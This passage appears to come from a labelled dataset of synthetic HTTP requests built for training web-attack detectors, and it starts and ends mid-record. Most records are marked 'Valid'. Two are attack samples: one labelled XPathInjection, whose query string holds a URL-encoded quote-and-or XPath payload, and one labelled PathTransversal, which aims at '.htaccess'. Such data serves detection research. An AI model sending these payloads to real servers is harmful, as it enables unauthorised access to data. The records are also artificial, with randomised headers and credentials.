Accept-Language: hminl1dx-a8;q=0.6, ae8lb-xRi6rd;q=0.7
Cache-Control: no-transform
Client-ip: 133.135.129.178
Cookie: RrOast=yrE
Cookie2: $Version="32"
Date: Sat, 29 Oct 05 01:42:38 UTC
ETag: "5QDGS.NV9zzymwcyb"
Expect: u70trk
From: lqlhi@vaenn.fr
If-Modified-Since: Fri, 26 Dec 08 16:52:58 GMT
If-Unmodified-Since: Sun, 18 Nov 07 12:44:16 GMT
If-Match: *
If-None-Match: "Ho922bMtLAiULnm"
If-Range: *
Max-Forwards: 777
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic NWxtbmVhdW06NmlhZXll
Authorization: Basic cGV3eTplc3Njc2Vp
Range: 8-,-0,6-
Referer: /rway.exe
TE: trailers
Trailer: If-Range
User-Agent: 5ihdaIahdr4hydt
UA-CPU: PowerPC
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 738x004
Via: FTP/3.1 www.nthbe.html, 1.4 www.7o7coewd.jpg:9, HTTP/9.7 www.ebseOohO.png
Transfer-Encoding: gzip
Upgrade: ltniik/7.5, 1Ntcmo/9.7
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2743
Start - Id: 13016
class: Valid
GET /6arTepej/heDfedmwntfkg/3t/ipp/hty-IQGBaTmYgBPc/og8z9kQbia3h/.lOrmMu9linkX/u6pPQOuLkSu/3bhhehr51ip/kswz.mdb?lJghDa8=1023261&eiS=ito7gecapunAt3Y7h1 HTTP/1.0
Host: 67.15.220.200:00
Connection: ntiE9o
Accept: */*
Accept-Charset: x-mac-roman;q=0.3, x-mac-japanese;q=0.0, euc-kr;q=0.7, iso-8859-3, gb2312;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 82.22.221.79
Cookie: HNBboD.e@mY=2;qtedA0u9dol=o@89r
Cookie2: $Version="104"
Date: Tue, 05 Dec 06 02:56:50 UTC
ETag: "ansp2fbURx9hGqH@o8U"
Expect: Xeaushv
From: hhrsnmqd@cyrn.com
If-Modified-Since: Sat, 20 Jan 07 24:01:51 UTC
If-Unmodified-Since: Sat, 13 Sep 08 16:56:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 10:06:10 GMT
Max-Forwards: 8
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic YW53aWVhOmRzM21hZWh2
Authorization: hEmo3 gtAictP=eytcrh
Range: 777-8861,-671902,43-427
Referer: /tgiy/renleg/tttmge.nsf
TE: gzip,gzip
Trailer: Range
User-Agent: dareaverl (fRa68afz4; sZjfN6Y; iB_X9N@b9; 6Hg5A2A; dFakFjpc7)
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: HTTP/0.4 11.128.39.245
Transfer-Encoding: compress
Upgrade: zflt/3.2, paby/1.7, ges/5.4, den/9.0, ioa/1.3
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13016
Start - Id: 18176
class: Valid
GET /toj4cajsrleph/emlsg7gZJns8Y/itmemsooEiAl/LscriptJ26oPh3QqT/hXceontkhontede/IahW/r9aernt.exe?@ggMgthttpX=hBVIas&tqiaetyilsepl6=is8f2BzY2p3U&mtsaogso=EArtpKuer HTTP/1.1
Host: www.naaMeau.com:80
Connection: au8r1emr
Accept: audio/x-wav;q=0.0, application/x-tar
Accept-Charset: x-mac-icelandic;q=0.9, iso-2022-jp;q=0.5, euc-tw, windows-1255, x-mac-arabic;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: h5nveo-gt
Cache-Control: no-transform
Client-ip: 235.3.254.254
Cookie: aONMQ=e0aga(;ne=sxaecmIpcsiaitcb;feoCa=  3v jrtuh;
Cookie2: $Version="112"
Date: Wed, 29 Jul 09 21:40:57 GMT
ETag: W/"EwNu1@ChyBMDCdLM"
Expect: 100-continue
From: bsls@bhsx2cetl.be
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Wed, 14 May 08 08:40:51 UTC
If-Match: *
If-None-Match: "j1JGS-@ozVNlrNF9L9pC"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 2982
MIME-Version: 2.5
Pragma: 5reeo=ble
Proxy-Authorization: Digest algorithm=MD5
Authorization: naLg Afdecvbr=tiaol0d
Range: -639
Referer: http://aedq.fr/prtnns.gz
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: tqDDxQ http://www.ooEeo2ir.de
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3922x0648
Via: 5.1 www.oHmeed.html, 8.3 www.idlne.gif:16939
Transfer-Encoding: compress
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 4999620100114166979
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 18176
Start - Id: 49647
class: XPathInjection
GET /n7M/oreoarlrAb7igjirn/iPl8mXA8pF6C1938V-/dte/hFZEgfC5HIwO2K@/RnRBlbSeXwWE/Hr4_VeF0GKEinput.mdb?elulsepot8t=hm2dsqesz1mc&srr=%27t48c0access_log%40+l%28It&zNHZpune=4&ius6l6sdodgm=tv1P&tn6e=015&access_logKiframehu@paccess_loggZ=500318&ot45noTDio=+ainclude%5Cl+sam%5Ba3%3F2%7ChT%26Bni5&z7terysfnwhdae=3oebg4%27+++or+++a%2FrA5Nnr%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D08%5D+++or+++++%27ycw%27++%3D++%27&dpsmeee=r_PENg&oihnTsftg=lpasswdeF&I6ngg_NmEecho=aeecd HTTP/1.0
Host: www.bco1zfnc.fr:8
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: ratd-isPcAto;q=0.1, pdo-yoa4cn, t3-uslgfeB;q=0.8
Cache-Control: no-transform
Client-ip: 18.132.255.142
Cookie: 8lLsaw=492568;lhrysndlntsak=aPI.CuUbZUZy;N8LbjUE=tkgXFU
Date: Wed, 07 May 08 09:25:20 UTC
ETag: "arPv@_rQlS7TT1-_Zmr"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 09 Jun 07 06:29:22 CET
If-Unmodified-Since: Mon, 30 Jul 07 06:25:03 GMT
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "y@gyu40UFW2RU@gHub"
If-Range: Tue, 03 May 05 11:09:00 CET
Max-Forwards: 5921
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXR4Y2FuZmVyZ2lzdUVlbnRzYUJIZWdqWmhua2VwZTFlZXNt
Authorization: aieon agLsomy=lader
Range: 4-,650706-6695,41362-
Referer: /lpLlhoRi/ihtn.exe
TE: trailers,gzip;q=0.6
User-Agent: Mozilla/3.1 (Windows; U; WinNT 7.5; se-dg; rv:4.5.3) Gecko/70391857
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: identity
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49647
Start - Id: 2846
class: Valid
GET /taeowattPb/7peo5.m@wNax-fO/-@SoexecsPUEHsB/yqXcreSeaEtH0oi3d8/svb4PrHFU9maEw6FcA/afoat4dcP2iejl/PS/l7V/eaRrTjgN-REDV3m.cfYA/c2c/_.9inFAplCfqgm4.bin?JHOJNijmochalUZi=%26v%3E&ToDO=zh6fdiana+&7cZeex4=ysnteh&3qdoUrasfKcs0ck=eFoe&batasot=jieDatnb%3Bencmscript&yced=93&do4hcswtp3mo2si=epGiXb9I-&untmnasmhrr=409303&6enln=a%40f6t-x1O6&mtetdr=dqe&q6aOsffen=e2torts0iTuhxae&5VRr6nph-passthrup=zJihq&U__Feb8qBo=a&ttytco=%27E&wte=863442 HTTP/1.0
Host: www.eset.gov
Connection: eueTpi
Accept: */*
Accept-Charset: isiri-3342, euc-kr, windows-1255;q=0.0, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: nL-snyaeg, jnpnisn-ieu, h28Tdwe5-tdluE;q=0.7, am24-73mta5tn, ivgzS4-ortnmr;q=0.8
Cache-Control: no-store
Client-ip: 82.194.135.99
Cookie: herMtszinFyasls=dllng0oemt;mo4=xmaG.;hndsxboonex=documentfo4 t@ocqpeef
Cookie2: $Version="975"
Date: Mon, 14 Sep 09 21:42:38 GMT
ETag: "6xly@q8J9VDatUUHJ"
Expect: 100-continue
From: ontooib@ikmeqssL5.gov
If-Modified-Since: Sat, 21 Jan 06 01:05:15 UTC
If-Unmodified-Since: Mon, 14 Sep 09 21:51:54 UTC
If-Match: *
If-None-Match: "gWlKTGW9ZfrbNZVBw"
If-Range: Thu, 07 Aug 08 07:01:31 GMT
Max-Forwards: 598
MIME-Version: 3.3
Pragma: j5=h
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: Digest realm
Range: 25556-,632888-19873
Referer: http://www.etrea.org/cinpr4o/tnts.php4
TE: trailers
Trailer: TE
User-Agent: voHEyan/0.6.3.4
UA-CPU: Sparc
UA-Disp: 9780,426,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7338x2329
Via: HTTP/9.4 www.2ttw.gif:4497, FTP/6.4 45.2.94.224, 9.6 108.241.139.198
Transfer-Encoding: gzip
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 480 97.81.77.101 "sictbqdedelbsl5n" "Thu, 16 Sep 04 22:58:11 CET"
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 674535146316
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2846
Start - Id: 19548
class: Valid
GET /tHpzGLJD3Qa7I3ux/teOJzkmqkE2rNhsALhVR/aAqDP4/Haz/qnZfK9pTCk.nsf?KjAZ40a0u6=2e%3B%7EPtt+Hm4gTo%2B%7C%29d&Poa=tophrts&tehuiagalNpha=79&Eeoeh=rd9%3Eoa%3D%2Bn&6UsG5=KnaPeggjiyeuqeunionh&4tty=Ackbo&deleteKtl@Z=ere&3euoe=mEfF5-.ORVLc HTTP/1.1
Host: www.eaeaeapal7.de
Connection: yehceaom
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 235.21.176.99
Cookie: dzgv0d=97171212
Cookie2: $Version="4"
Date: Mon, 01 Dec 08 05:09:37 CET
ETag: "pwhBmkWUsY.qmAUm8"
Expect: 100-continue
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 05 Feb 09 17:52:26 UTC
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: "JVcZynwGilE42jddDrxa"
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: *
Max-Forwards: 8338
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: Basic TjNZbTI6Smw0MW4=
Range: 156-,0-
Referer: /8aD82dym/dvtlptso/aaeh/ntaic.mpg
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 3.2; ec-Ns; rv:2.3.4) Gecko/94270463
UA-CPU: MIPS
UA-Disp: 146,7651,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: 6.7 34.137.51.236, 8.4 www.snianlGn.tiff
Transfer-Encoding: gzip
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 00842
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19548
Start - Id: 14108
class: Valid
GET /r4Yrt1nipasoi/TT.pl? HTTP/1.0
Host: 33.208.225.149:80
Connection: close
Accept: */*
Accept-Charset: cp-950, iso-2022-kr;q=0.0, x-mac-greek, iso-8859-15;q=0.2
Accept-Encoding: 
Accept-Language: a-hgr5ta;q=0.6, 0so-o;q=0.2, oeyn4s-n8htsuet;q=0.2, Lcwsn-qegA;q=0.4
Cache-Control: only-if-cached
Client-ip: 250.248.98.251
Cookie: ll=aelwtjyji;csthdoaToAou4d=wcir;t3ubNf6v@=t7Tesen650;eoadoiwzI8=29;cosoy77ttrdlEt=1xr;8Em=timsi
Cookie2: $Version="671"
Date: Mon, 16 Jun 08 20:15:28 UTC
ETag: W/"kBd2fQueYc25Znl@V"
Expect: sK3n=wyein
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Fri, 30 Jun 06 24:58:10 UTC
If-Unmodified-Since: Sat, 25 Mar 06 21:11:15 GMT
If-Match: "bUKWX@us4RFtSc4q"
If-None-Match: *
If-Range: Tue, 26 Feb 08 04:18:31 CET
Max-Forwards: 965
MIME-Version: 4.3
Pragma: oh=e8lurh
Proxy-Authorization: NTLM cm4wZGF5c2RuYnNha2lUb3NzZXQ0Ym9tYWV6aGVha3JhcWV5YmdkeGV3
Authorization: NTLM bWVzdTdsb2cwaW91OHVkb2R0bXJhaGVhYXRzSHQwaGh1dFRxdHM2bXNkdXN6cg==
Range: 413202-93318,-42
Referer: http://hdloedc.biz/aylarer.cgi
TE: trailers
Trailer: Connection
User-Agent: tcaIwank
UA-CPU: 68000
UA-Disp: 8924,5533,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 454x057
Via: 4.8 www.njtnnwte.shtml, HTTP/1.5 85.236.217.62
Transfer-Encoding: n5boDd
Upgrade: iDo/6.8
Warning: 086 www.tdkos.css "uisvnesrhn5pye" "Mon, 27 Dec 04 14:53:29 UTC"
X-Forwarded-For: 190.45.210.98
X-Serial-Number: 6453522338858945
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14108
Start - Id: 12785
class: Valid
GET /5UwTPj5tyfW@/tit5eirqo4onuauf/rwKtgC/qivrfitooztss/cEGk1j6WIFMsystemY/eF5HK.o.i262@sZ1z/pUEHYJ5xd/e7_39wSgnii/tntsdsj/eejE9asqmaaoDe/9eseuggurypimotTesst/iPzcZFB.gif?nwnxiua=egthres+ten&maou0Itm9=987&nnikrfn=eteruvgW&bonroi3eh=aoeywncdacrTm&kaecct6kN2wmo=49021112&bRc9=30639&iwSoeneLirBle=h_Q-fh&actOmsshtonfn7=tsr&rtlu6tawse=u%29eun HTTP/1.0
Host: 206.56.97.211
Connection: keep-alive
Accept: video/mpeg, video/quicktime;q=0.3, text/html
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: C-OiLoglaH
Cache-Control: max-stale=215
Client-ip: 132.64.16.85
Cookie: viEs0ei=austmaHt;peurckhqs;iv@0kAf=42;ye1mt1sr=ttmRhAt;etTln9=69810250
Cookie2: $Version="56"
Date: Tue, 09 Jan 07 21:22:26 UTC
ETag: W/"SvtKjp.fqG33oUHI"
Expect: 100-continue
From: 2ttaM@etgid.uk
If-Modified-Since: Thu, 29 Mar 07 12:59:22 UTC
If-Unmodified-Since: Tue, 08 Sep 09 13:01:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 7.0
Pragma: mtyrsI=uc
Proxy-Authorization: h2nto aMNln=ehlk
Authorization: Digest nonce
Range: 880687-,10-
Referer: /teaz/dyma/asWor/rqe14tO2/oib3sr.txt
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: ad2yee
UA-CPU: MIPS
UA-Disp: 935,0651,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3357x7611
Via: 4.1 www.dBymlA.css, plco/7.0 180.159.79.194:51
Transfer-Encoding: gzip
Upgrade: DoR/2.1, rahogo/2.6
Warning: 738 www.mdRbith.jpeg "5erngdnraionsLeaa6n" 
X-Forwarded-For: 192.196.28.56
X-Serial-Number: 3346071128
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12785
Start - Id: 30070
class: Valid
GET /ZW8aME1-L/ri5rvN6bnaa7anwsShom/rpareebt/tRbNGqLo5CDSxn/eSWXpofW.kc9U/nullcBprocessing-instructionm8Ck/ss8asgvspbngns.cfm?yasabeasioh=%5C%5D%25dawindow.openrr%28drafe&ertdrvv96zh=rnkihric HTTP/1.0
Host: 113.97.74.89
Connection: ffpUsb
Accept: application/rtf, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: mhnhd-lkttdtSl;q=0.2
Cache-Control: iidei=leny0lS
Client-ip: 21.39.235.102
Cookie: cRW9BMV0x2O=53784;tSm7zhofomnpgn=peR;wiEahztoS=weoS
Cookie2: $Version="8"
Date: Thu, 17 Aug 06 09:34:25 GMT
ETag: "mUmjH8HWG3W8G@glmCfK"
Expect: orsnozE
From: 8hdarpl@eewtgm.st
If-Modified-Since: Sat, 10 Sep 05 04:34:47 UTC
If-Unmodified-Since: Sat, 26 Mar 05 03:38:20 GMT
If-Match: "uG6fl5oLm5GXILgA"
If-None-Match: "By_-wQgbwgJDpMLjsspC"
If-Range: Thu, 29 Dec 05 19:51:15 CET
Max-Forwards: 88
MIME-Version: 0.9
Pragma: i5i='h'
Proxy-Authorization: hh5ore wukONet=mohs
Authorization: Basic Y21ucnduOjllZWE=
Range: -551
Referer: /xljtre/elhr/orui1e.jpeg
TE: trailers,chunked
Trailer: Referer
User-Agent: sK942G2Uj http://www.rgLlss.be
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 335x9769
Via: YnEnec/8.3 52.218.224.185, 5.6 66.80.102.144
Transfer-Encoding: compress
Upgrade: wteear/7.0, siaf/7.6, vawdDs/3.7, isedd/5.7, tns/6.0
Warning: 700 www.naeNeA.htm "tcetn4ey7Remiq" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 442439302674714
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 30070
Start - Id: 5417
class: Valid
PUT /SaeNmeeh5m/15esj5oezrlbweha/cse1r4oyFreztec/2nBaFqk8/uej0mnHDHEVpJcn_/C_7k/lctGkZm/jwtD9etnspeaf/vehRXZV/mailICvhtaccesdbP/eb2oYwL/pkN.html? HTTP/1.1
Content-Length: 50
Content-Language: iP,ocPe,tgef6UL
Content-Encoding: compress
Content-Location: /otTNe/cseqis90/59oiR.css
Content-MD5: bDRiYUVvZWV0eGlyb3V0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jun 07 10:24:28 UTC
Last-Modified: Tue, 30 Dec 08 09:33:57 UTC
Host: 127.240.130.59
Connection: keep-alive
Accept: video/*;q=0.5, image/png
Accept-Charset: iso-8859-5, us-ascii, windows-1257
Accept-Encoding: gzip, identity;q=0.7
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 113.143.26.134
Cookie: krdfsgD2=8445;laaelsrypT=813700129;mssO=3;8or=aswuamkausoomnii;nauamoiau=s6ush;peTsedpo=2072
Cookie2: $Version="249"
Date: Thu, 13 Apr 06 19:13:10 GMT
ETag: W/"sQ_4zuPZxjziRV2xLX"
Expect: e1h4heeB
From: aoaomzge@wiejdTf.ch
If-Modified-Since: Fri, 09 Jul 04 06:10:05 UTC
If-Unmodified-Since: Mon, 03 May 04 24:28:47 UTC
If-Match: "s2tMd1cEK.s24GdST"
If-None-Match: *
If-Range: Thu, 12 Jan 06 03:56:50 UTC
Max-Forwards: 130
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM YWt3SHRhbmRlOGlzaWM3NnRhdG5oMFM2b25ocnRvMHJkeURyc2VhZUFkMWk=
Authorization: Basic WGVycjp1YWZy
Range: 33401-381,35239-,-73
Referer: http://7ddeRok.uk/yrae/oeaehi/iBnb6efd.exe
TE: trailers,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/9.6 (X11; U; Linux i586 7.4; tI-rd; rv:7.4.3) Gecko/14653422
UA-CPU: MIPS
UA-Disp: 958,782,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 237x186
Via: 8.8 188.213.104.59, HTTP/8.3 77.190.43.31, 0.6 74.40.182.54
Transfer-Encoding: 0aaMeb
Upgrade: s4syeh/8.2, Palt/1.0
Warning: 758 183.182.45.114 "ztx0agr" 
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ir4j=e&yrnn96imie=3271352464&TLE-6glogEperlc=sbrei

End - Id: 5417
Start - Id: 26057
class: Valid
GET /y-Cbmv0/tpanP6PBYsbtRe1Q/dlie/oM.HDP.1kOTqx/og0A1wGnT9k/s4-Wsv4Ew1bHJ5uv8i/p05hKO7@N5.Wyq0o/rsSnakH/istatunmhrn.swf? HTTP/1.1
Host: www.konm4hv.biz
Connection: ltadnb
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: we9mdqh-smyz, i0a3cMc-fTc;q=0.1, rdnacde-udrW, gueuv-ocra
Cache-Control: min-fresh=60014
Client-ip: 23.160.70.27
Cookie: fIheiSbRo=dyiei;fclae=tNxFxS;ible= &>&include;Tx6n3q=775962929;pyE=ns2htzts4nhtgToo
Cookie2: $Version="586"
Date: Tue, 10 Jun 08 15:59:09 UTC
ETag: "03LfoeOPlKIaZ_s2G"
Expect: Emueor
From: alLeiF@uTy8difar.biz
If-Modified-Since: Tue, 23 Feb 10 13:09:47 CET
If-Unmodified-Since: Sat, 25 Mar 06 07:51:13 CET
If-Match: "1jsSphXQxbQr1J90"
If-None-Match: *
If-Range: *
Max-Forwards: 121
MIME-Version: 1.8
Pragma: poa=nls
Proxy-Authorization: Digest username="mpdha"
Authorization: NTLM b2Uzckl0aHA2ZW50d2FnbzUyc2V5b25vcmxkMTQyeTJ5c3NJNzI=
Range: 077750-,-78409
Referer: /leee/6lcFhepu/trrtfx.dll
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.7 (Windows; U; Windows NT 6.0; is-qi; rv:5.7.3) Gecko/96620398
UA-CPU: StrongARM
UA-Disp: 889,8239,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 096x0326
Via: lotlEq/7.0 142.190.62.170, FTP/2.0 www.ZaSaai2o.shtml
Transfer-Encoding: gzip
Upgrade: 33tso/9.6
Warning: 573 248.81.173.161 "hSShBh8osar8mnn" "Thu, 15 Jun 06 19:23:51 CET"
X-Forwarded-For: 217.162.242.84
X-Serial-Number: 6743288486222977
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26057
Start - Id: 34853
class: Valid
POST /eLufpPkL.pl? HTTP/1.1
Content-Length: 29
Content-Language: nt
Content-Encoding: gzip
Content-Location: /amtr/rafu9.php
Content-MD5: eWFoZW5lRWhMbnJpdHMxbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 May 05 15:02:15 UTC
Last-Modified: Sat, 18 Jun 05 23:20:04 UTC
Host: www.cdeebebR.de
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 217.66.243.25
Cookie: 5rnd0ruAvC=SE;lsit23aisgeOo3=rw8A_C;tlcraSEesg=samih
Cookie2: $Version="51"
Date: Sat, 09 Aug 08 07:31:46 GMT
ETag: "fW8R6n0BEooK0IFAoyX"
Expect: 100-continue
From: Jnyui@7erErt.cz
If-Modified-Since: Fri, 05 Dec 08 04:05:50 UTC
If-Unmodified-Since: Wed, 13 Apr 05 23:31:28 CET
If-Match: *
If-None-Match: "G608Mh@H6MifKBLOslN"
If-Range: *
Max-Forwards: 0936
MIME-Version: 8.9
Pragma: Eo='stt'
Proxy-Authorization: piRse 36rh0obt=bannf
Authorization: Basic YWllbjphbmJ6
Range: -00,9-5046
Referer: http://tnldEr8e.st/s8ITme/aitsdd/itIsI/niom.avi
TE: trailers,deflate;q=0.5,gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 2.6; he-dh; rv:9.9.0) Gecko/97067763
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-Pixels: 867x132
Via: FTP/5.2 www.crenl.shtml:743, 8.0 31.139.229.212
Transfer-Encoding: compress
Warning: 252 52.60.83.67 "gsw0us7t70cfreiHw" "Fri, 06 Aug 04 01:07:38 CET"
X-Forwarded-For: 235.64.29.202
X-Serial-Number: 4783301887030171933
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

ashtpnsaoieo=928272831&Xx=140

End - Id: 34853
Start - Id: 32190
class: Valid
GET /Tv51wzefUtntt4rst69h/as.mdb? HTTP/1.1
Host: 199.79.134.77:80
Connection: close
Accept: audio/x-wav;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 40.17.58.230
Cookie: iwe=rhsaolruEaers;oml=ro0window.open;obue=50;na=utedFi
Cookie2: $Version="095"
Date: Wed, 14 Oct 09 01:30:24 UTC
ETag: "Q5@6s8FXHF8dByi"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: emdtEi@eeio.net
If-Modified-Since: Thu, 01 Apr 10 08:13:10 CET
If-Unmodified-Since: Mon, 15 Feb 10 24:48:53 UTC
If-Match: *
If-None-Match: "veiP8TFZT8rA5n7po"
If-Range: "KHd-uXnbQgV9zLsSf"
Max-Forwards: 0
MIME-Version: 1.9
Pragma: 4d8=r
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: Basic bGdvcWlhbDpuYWthcw==
Range: -31011,02795-
Referer: http://icz8hR.ch/io7q4l2/0wri.aspx
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.1 (Windows; U; WinNT 4.2; OD-di; rv:6.6.5) Gecko/99140987
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9868x2835
Via: FTP/0.1 149.199.223.154, FTP/7.9 www.tooet.html, FTP/8.8 33.86.84.101
Transfer-Encoding: deflate
Upgrade: olxfEt/1.3, uztpu/8.7, nLiEo8/9.6
Warning: 807 86.138.171.101:76709 "oswel2" "Mon, 10 Sep 07 10:52:59 CET"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 76488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32190
Start - Id: 46240
class: PathTransversal
GET /duyw7y@FYUgyMul9gpw/vn/eciBsm/5yiV85x/3nRrx/oxm1Xcnw3jL_0i.gif?ntamckni=f%3A%2F.htaccess%7E&httohndbaota=731450853&having_@M=4erN000yTsAaam&iegcmnEaa=ucsf7ae+n%5D HTTP/1.1
Host: 246.166.174.166
Connection: tanep
Accept: */*
Accept-Charset: windows-1258, macintosh;q=0.1
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.111.235.221
Cookie: IweLJP@JheFscript=en8lG2ii
Cookie2: $Version="8"
Date: Wed, 26 Mar 08 24:55:04 GMT
ETag: "uVWqFjF1f7c@HvfRr"
Expect: hoahd=l6nt2Ete;SDpta=EeAen5
From: eftra@neleobejy.com
If-Modified-Since: Fri, 06 Aug 04 06:28:18 CET
If-Unmodified-Since: Fri, 11 Nov 05 23:47:50 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Apr 08 13:26:27 UTC
Max-Forwards: 5
MIME-Version: 1.9
Pragma: z1xn5hue='da'
Proxy-Authorization: oai3ur uAhsme=hhieet
Authorization: Basic bzZpbTdpZDpKa3VydGg1bQ==
Range: 173-
Referer: /h78ce3tl/ue9l2Et.swf
TE: trailers
Trailer: Accept-Encoding
User-Agent: 4X5N-L8 http://www.mdeO.net
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.9 194.136.148.206, iis6mO/4.7 www.vInnB.png
Transfer-Encoding: deflate
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46240
Start - Id: 7921
class: Valid
PUT /iQhf8FKFMFFyr8/OuX/rY8PfePNC_wyyiCXfa.tiff? HTTP/1.1
Content-Length: 126
Content-Language: nD2ynWet,sQseq
Content-Encoding: deflate
Content-Location: /3cief/Nagpea.php3
Content-MD5: YWlycmUwb0VydGllYmVuOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Nov 04 20:00:02 GMT
